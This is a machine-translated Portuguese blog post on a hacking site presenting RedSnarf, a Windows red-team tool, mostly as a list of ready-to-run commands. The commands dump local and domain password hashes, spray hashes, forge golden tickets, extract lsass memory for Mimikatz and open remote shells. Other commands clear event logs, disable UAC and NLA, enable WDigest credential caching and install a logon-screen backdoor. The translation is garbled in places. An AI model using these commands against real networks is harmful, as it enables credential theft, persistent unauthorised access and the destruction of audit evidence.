RedSnarf - Uma ferramenta para Pentest / Red-Teaming para ambientes Windows - Anonymous Hacker

[Latest News][10]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

RedSnarf - Uma ferramenta para Pentest / Red-Teaming para ambientes Windows

RedSnarf - Uma ferramenta de Pentest / Red-Teaming para ambientes Windows

RedSnarf é uma ferramenta de teste de caneta / red-teaming por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio do Windows usando o OpSec Safe Techniques. 

A funcionalidade RedSnarf inclui:
  • Recuperação de hashes SAM locais
  • Enumeração de usuários / s executando com privilégios de sistema elevados e sua correspondente senha de segredos de lsa;
  • Recuperação de credenciais em cache do MS;
  • Pass-the-hash;
  • Identifique rapidamente combinações de nome de usuário / senha fraco e adivinhado (padrão do administrador / Senha 01);
  • A capacidade de recuperar hashes em um intervalo;
  • Pulverização de Hash -
  • Credsfile aceitará uma mistura de pwdump, fgdump e texto simples nome de usuário e senha separados por um espaço;
  • Lsass dump para análise offline com Mimikatz;
  • Dumping de hashes do controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local;
  • Dumping de hashes do controlador de domínio usando o método drsuapi;
  • Recuperação de Scripts e Políticas pasta de um controlador de domínio e análise para 'senha' e 'administrador';
  • Capacidade de descriptografar cashword hashes;
  • Capacidade de iniciar um shell em uma máquina remota;
  • A capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna)
  • Os resultados são salvos por host para análise.
  • Ativar / Desativar o RDP em uma máquina remota.
  • Altere a porta RDP de 3389 para 443 em uma máquina remota.
  • Ativar / Desativar NLA em uma máquina remota.
  • Encontre onde os usuários estão logados em máquinas remotas.
  • Tela de logon do Backdoor Windows
  • Ativar / Desativar UAC em uma máquina remota.
  • Stealth mimikatz adicionado.
  • Parsing de hashes de domínio
  • Capacidade de determinar quais contas estão habilitadas / desabilitadas
  • Faça uma captura de tela de um Computador de Usuários Active
  • Registro Remote logado Desktop de usuários ativos
  • Decrypt Windows CPassword
  • Decrypt WinSCP Password
  • Obter usuários SPN's
  • Recuperar senhas WIFI de máquinas remotas


Requisitos de uso do RedSnarf :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Recuperação usando procdump - https://technet.microsoft. com / en-us / sysinternals / dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - usado com a análise de informações Mimikatz localmente
Mostrar Ajuda
./redsnarf.py -h
./redsnarf.py --help

Recuperar hachas locais Recuperar hachas
locais de uma única máquina usando credenciais locais fracas e limpar o registro de eventos de segurança
./redsnarf.py -H ip=10.0.0.50 -uC security

Recupere hachuras locais de uma única máquina usando credenciais locais fracas e desmarcando o log de eventos do aplicativo
./redsnarf.py -H ip=10.0.0.50 -uC application

Recuperar hachas locais de uma única máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Recuperar hachas locais de uma única máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em um intervalo de rede usando credenciais de administrador local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com


Hash Spraying
Spray Hashes em um intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Recuperar Hashes em um logon de domínio de intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Verifique rapidamente as credenciais
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Verifique rapidamente o arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y


Recuperar Hashes de Domínio
Recuperar Hashes usando o método drsuapi (Mais Rápido)
Este método é compatível com um sinalizador opcional de -qy que irá consultar o LDAP e produzir se as contas estão ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Recuperar Hashes usando NTDSUtil 
Este método oferece suporte a uma bandeira opcional de -qy que consultará o LDAP e emitirá se as contas estiverem ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y


Coleta de informações
Copie a pasta Políticas e Scripts de um Controlador de Domínio e analise a senha e o administrador
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Decrypt Cpassword
./redsnarf.py -uG cpassword

Localizar usuário - ao vivo
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Localizar usuário - Offline (pesquisa informações pré baixadas)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Listado de Tarefas do Display NT AUTHORITY \ SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Screenshot da área de trabalho de um usuário remoto conectado no Active
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y


Misc
Inicie um Shell em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Inicie um Shell em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Execute stealth mimikatz, esta opção dispara um servidor da Web para servir um script de powershell , isso é obstruído e codificado lado da máquina, os dados não tocam o disco - os creds são codificados para um estilo fácil de ler e ecoados de volta à tela.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Executar Comando Personalizado 
Exemplo 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Exemplo 2 - Citações duplas precisam ser escapadas com \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Política de Token de Acesso Local 
Cria um arquivo de lote lat.bat que você pode copiar e colar na máquina remota para executar o que irá modificar o registro e ativar ou desativar as configurações da Política de Token de Acesso Local.
./redsnarf.py -rL y

Wdigest 
Habilite o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Desativar o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Pergunta UseLogonCredential Wdigest valor de registro em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC 
Habilita o valor de registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Desabilitar o valor do Registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Consulta o valor do registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor Windows Screen - Pressione Left Shift + Left Alt + Print Screen para ativar 
Habilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Desativar o valor do Registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Valor de registro Backdoor da consulta em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon 
Habilita o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Desabilitar o valor de registro do AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Consulta o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Bloqueie uma sessão de usuário de máquina remota usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y


RDP
Ativar RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Desativar o RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Verificar o status do RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Alterar a porta RDP de 3389 a 443 - Alterar a porta RDP para 443 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Alterar a porta RDP para o padrão de 3389 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Query RDP Port Value em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Ativar Multi-RDP com Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Ativar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Desative o RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Pergunta RDP SingleSessionPerUser status em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q


NLA
Habilitar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Desativar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Verificar o status NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q




Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search